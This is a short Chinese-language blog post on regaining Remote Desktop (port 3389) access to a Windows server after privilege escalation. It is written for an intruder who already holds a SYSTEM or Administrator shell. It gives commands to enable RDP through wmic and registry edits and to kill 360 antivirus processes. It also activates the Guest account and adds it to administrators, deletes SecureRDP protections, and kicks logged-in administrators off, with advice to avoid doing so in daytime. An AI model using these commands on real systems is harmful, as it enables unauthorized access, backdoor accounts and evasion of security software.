提权之后连接不上3389

Posted 2020-08-02

system或Administrator权限的shell提权加了账户之后连不上3389，总结原因有以下几点：

没开3389
有杀软，验证软件
3389端口变换
管理员限制
系统已达最大连接数处理

1.没开3389

开3389一句话
wmic RDTOGGLE WHERE ServerName=‘%COMPUTERNAME%‘ call SetAllowTSConnections 1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
2.有杀软，验证软件
360杀软 ：先执行tasklist看一下进程列表，然后

taskkill /im /f 进程名.exe
把主动防御结束
360相关进程如下：
360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe
（PS：结束不了进程时，query user 然后logoff管理员id）

麦咖啡杀毒软件：
启用Guest账户，修改Guest用户的密码，添加Guest为administrators用户组。
于是cmd命令如下：

net user guest /active:yes //将guest用户启用
net user guest 123-binghesec //修改guest密码
net localgroup administrators guest /add //添加guest到管理员用户组中
护卫神
把hws.exe hwsd.exe禁止启动后重启

SecureRDP, 
连接远程桌面的时候服务器出现如下提示：
You are not allowed to access to this Terminal Server. Please contact your administrator for more information. Secured by SecureRDP.就是SecureRDP这个软件搞的鬼
然后就是删除注册表项：上个远控删除注册表

reg delete "HKEY_LOCAL_MACHINE\Software\Terminalsoft\WTSFilter" /va /f
3.3389端口变换

netstat -ano查看端口和使用端口的进程pid，然后Tasklist看一下有哪个svchost.exe进程的pid使用了端口
注意，是svchost.exe当中的某个。
（能查看注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control \TerminalServer\ WinStations\RDP-Tcp 在该注册表位置PortNumber的值即位3389端口值 也是个办法）

4.管理员限制

限制的是密码最短长度
把密码位数设置长一点就ok，原先密码是123456，现在改为08secabcd!@#$就过了如果还是添加不上，可以尝试用vbs脚本来添加。

5.系统已达最大连接数处理

对于这种上不去的，首先query user查看在线的账户，然后看他的登陆ID，一般是0，最高不超过8，超过8说明服务器好久没重启了（这个没准的,有的系统设置最大连接就是1）
然后logoff ID，就把对应ID的管理员踢掉了。然后就能登录了。
当然你在logoff的时候不要把自己logoff了，也不最好不要白天踢人。管理员在线被人踢掉的话，你懂的。— —！

mstsc /console 这样之后是可以直接挤下去一个人的
PS（用强制登录3389软件也是个办法